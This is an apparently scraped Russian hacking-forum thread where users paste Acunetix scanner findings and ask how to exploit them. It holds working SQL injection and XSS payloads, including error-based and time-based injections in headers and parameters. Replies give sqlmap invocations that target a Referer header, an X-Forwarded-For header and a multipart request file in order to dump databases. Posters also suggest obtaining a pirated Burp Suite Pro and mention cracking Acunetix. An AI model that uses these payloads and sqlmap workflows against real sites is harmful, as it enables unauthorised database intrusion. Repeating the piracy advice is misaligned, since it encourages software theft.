HTTP parameter pollution

Vulnerability description

This script is possibly vulnerable to HTTP Parameter Pollution attacks.

HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If the web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either clientside or server-side attacks.

This vulnerability affects /news/events/ (https://antichat.live/file_/C_/ProgramData/Acunetix_20WVS_2010/Data/Reporter/ReportItemTemp.xml/).

Discovered by: Scripting (HTTP_Parameter_Pollution.script).

Attack details

URL encoded GET input city was set to 156&n973845=v906453

Parameter precedence: last occurrence

Affected link: /retail/?city=156&n973845=v906453&shop=1572&map=yes

Affected parameter: city=156

--------------------------------------------------------------------------------------------

Cross site scripting (verified)

Vulnerability description

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.

This vulnerability affects /admin/login.php (https://antichat.live/file_/C_/ProgramData/Acunetix_20WVS_2010/Data/Reporter/ReportItemTemp.xml/).

Discovered by: Scripting (XSS.script).

Attack details

URL encoded POST input login was set to ticmeuga'"()&%prompt(923610)

---------------------------------------------------------------------------

кросс-скриптинг, говорит, у вас на сайте

↑ (https://antichat.live/posts/3947780/)
кросс-скриптинг, говорит, у вас на сайте


) переводчик просвящает?


↑ (https://antichat.live/posts/3947754/)
HTTP parameter pollution


по первой довольно печально... RFC3986

https://www.ietf.org/rfc/rfc3986.txt

в зависимости от методы атаки:

Если серверная - sql inj, клиентские обычно xxs, или же PTK - удаленное выполнение кода, вообщем попрощатся можно со всем в таком случае (если это конечно Ваше web app)

В презентации подробнее описано https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

А как быть с этим?

SSL 2.0 deprecated protocol

Vulnerability description

The remote service encrypts traffic using an old deprecated protocol with known weaknesses.

Affected items


Server
The impact of this vulnerability

An attacker may be able to exploit these issues to conduct man-in-the-middle attacks or decrypt communications between the affected service and clients.

How to fix this vulnerability

Disable SSL 2.0 and use SSL 3.0 or TLS 1.0 instead.

↑ (https://antichat.live/posts/3948628/)
А как быть с этим?
SSL 2.0 deprecated protocol
Vulnerability description
The remote service encrypts traffic using an old deprecated protocol with known weaknesses.
Affected items

Server

The impact of this vulnerability
An attacker may be able to exploit these issues to conduct man-in-the-middle attacks or decrypt communications between the affected service and clients.
How to fix this vulnerability
Disable SSL 2.0 and use SSL 3.0 or TLS 1.0 instead.


слабый криптографический ключ, возможность проведения mitm (перехвата зашифрованного трафика).. в случае удачной компрометации криптоключа

p.s. ну если совсем все так печально, там при запуски сканера (при первом) вставлена ссылка не спроста... вот найди ее и просканируй, половна вопросов надеюсь отпадут если посмотришь хотябы сорс страниц после скана.,

Ты тестил только одним сканером? Протести ещё парочкой! Вдруг срабатывания ложные..

↑ (https://antichat.live/posts/3952848/)
Ты тестил только одним сканером? Протести ещё парочкой! Вдруг срабатывания ложные..


да хоть 10-ю, толку не много даст без логики какой либо вообще, если спрашивается обозначения... ладно еще применение уязвимостей, вот тут то все и начинается... а так, чисто на красные полосочки с желтыми посмотреть..

HTTP Parameter Pollution (http://raz0r.name/articles/http-parameter-pollution/)

Что можнос делать с сайтом с этой уявимостью?

↑ (https://antichat.live/posts/3955204/)
HTTP Parameter Pollution (http://raz0r.name/articles/http-parameter-pollution/)
Что можнос делать с сайтом с этой уявимостью?


выше смотри

/threads/436648/#post-3947874 (https://antichat.live/threads/436648/)

↑ (https://antichat.live/posts/3955204/)
HTTP Parameter Pollution (http://raz0r.name/articles/http-parameter-pollution/)
Что можнос делать с сайтом с этой уявимостью?


Акунетикс реагирует так.

Если через параметр можно протащить пэйлоад в виде &param2, то считается, что HTTP Pollution Есть.

По факту, это лишь означает, что в значении параметра можно протащить спецсимволы, которые не преобразятся а отразятся в чистом виде в теле Веб-страницы. Так что по сути - копай через этот параметр XSS.

А есть альтернатива акунетиксу?более мощный инструмент?

В мапе пишет

[ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) byusing higher verbosity levels

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

URL encoded GET input order was set to 1,(select case when (3*2*1=6 AND 000513=000513) then 1 else 1*(select table_name from information_schema.tables)end)=1

This vulnerability affects /tools/calendar.php (https://antichat.live/file_/C_/ProgramData/Acunetix_20WVS_2010/Data/Reporter/ReportItemTemp.xml/).

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

URL encoded GET input date was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/


Подскажите как раскрутить мапом

↑ (https://antichat.live/posts/3955295/)
А есть альтернатива акунетиксу?более мощный инструмент?


Мне в соседней теме owasp zap посоветовали.

↑ (https://antichat.live/posts/3955295/)
А есть альтернатива акунетиксу?более мощный инструмент?


альтернатив полно, самые крутые штуки которыми я пользовался в kali linux это были - OWASP OWTF (https://www.owasp.org/index.php/OWASP_OWTF) и OWASP Zed Attack (https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project)

Можно использовать ещё Nessus интегрируя его с Metasploit кстати в Metasploit тоже полно модулей для тестирования. Ну и конечно же можно использовать мой любимый

OpenVAS желательно новую версия.. А если ты хочешь получить 100% результат и быть гуру в веб хакинге юзай как все нормальские пен-тестеры

Burp Suite (https://portswigger.net/burp/) только желательно найди pro в сети вроде на каком то торентрекере видел.

Referer: 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(113),CHAR( 104),CHAR(115),CHAR(68),CHAR(121),CHAR(72),CHAR(69 ),CHAR(108)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Cookie: PHPSESSID=jhhavo515jluqct43if2tj7fp3

как sqlmap"om раскрутить такую скулю?

--referer="1*"

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)

AppleWebKit/537.21 (KHTML, like Gecko)

Chrome/41.0.2228.0 Safari/537.21

X-Forwarded-For: 1' а как быть с этим?

↑ (https://antichat.live/posts/3963533/)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: 1' а как быть с этим?


гуглить вообще пробовали?

--header="X-Forwarded-For: 1*"

↑ (https://antichat.live/posts/3963533/)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: 1' а как быть с этим?


https://github.com/sqlmapproject/sqlmap/wiki/Usage

Настоятельно рекомендую запомнить Опцию

--wizard- Это опция помощник , sqlmap будет задавать тебе вопросы и на основании твоих ответов будет делать то ли и иное действие. тебе остаётся лишь жать кнопку , одну из двух

acunetix нашел sql в пост запросе

пост дата

Accept: */*

-------AcunetixBoundary_XRGQBWWRUS

Content-Disposition: form-data; name="act"

idx

-------AcunetixBoundary_XRGQBWWRUS

Content-Disposition: form-data; name="chk"

on

-------AcunetixBoundary_XRGQBWWRUS

Content-Disposition: form-data; name="code"

01

-------AcunetixBoundary_XRGQBWWRUS

Content-Disposition: form-data; name="fid"

В первые вижу,уязвимый параметр fid.Как записать в sqlmap?

↑ (https://antichat.live/posts/3967527/)
acunetix нашел sql в пост запросе
пост дата
Accept: */*
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="act"
idx
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="chk"
on
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="code"
01
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="fid"
В первые вижу,уязвимый параметр fid.Как записать в sqlmap?


пишите в ветку "вопросы по sqlmap" - /threads/431199/ (https://antichat.live/threads/431199/)

примерно такой запрос

python sqlmap.py -u 'target host' --data="fld=1" --dbs --random-agent

также помогает чтение help, там эта инфа есть


$ python sqlmap.py --help | grep -i post
--data=DATA Data string to be sent through POST
--safe-post=SAFE.. POST data to send to a safe URL

--------------------

вероятно поля только нужно все передавать, то есть act=1&chk=1 etc

↑ (https://antichat.live/posts/3967527/)
acunetix нашел sql в пост запросе


Это так называемый multipart запрос, который передается в мап через текстовый файл с подобным содержимым:


POST /evil.php HTTP/1.1
Host: site.com
Content-Type: multipart/form-data; boundary=-------AcunetixBoundary_XRGQBWWRUS

-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="act"

idx
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="chk"

on
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="code"

01
-------AcunetixBoundary_XRGQBWWRUS
Content-Disposition: form-data; name="fid"

*

Ставите ваш сайт в строку Host, ваш запрос в поле Post, а мультипарт вставляете в самом конце, отметив уязвимый параметр *. И тогда будет примерно такой запрос: sqlmap.py -r "C:\site.txt" --random-ag

Да уж, я погляжу программа не для средних умов. Установил самую последнюю версию 10.5, легко крякнул....и всё. Полный бумбум. Просканировал им сайт и ничего не понял. Может русификатор есть какой, мож по русски как то что то будет доходчиво.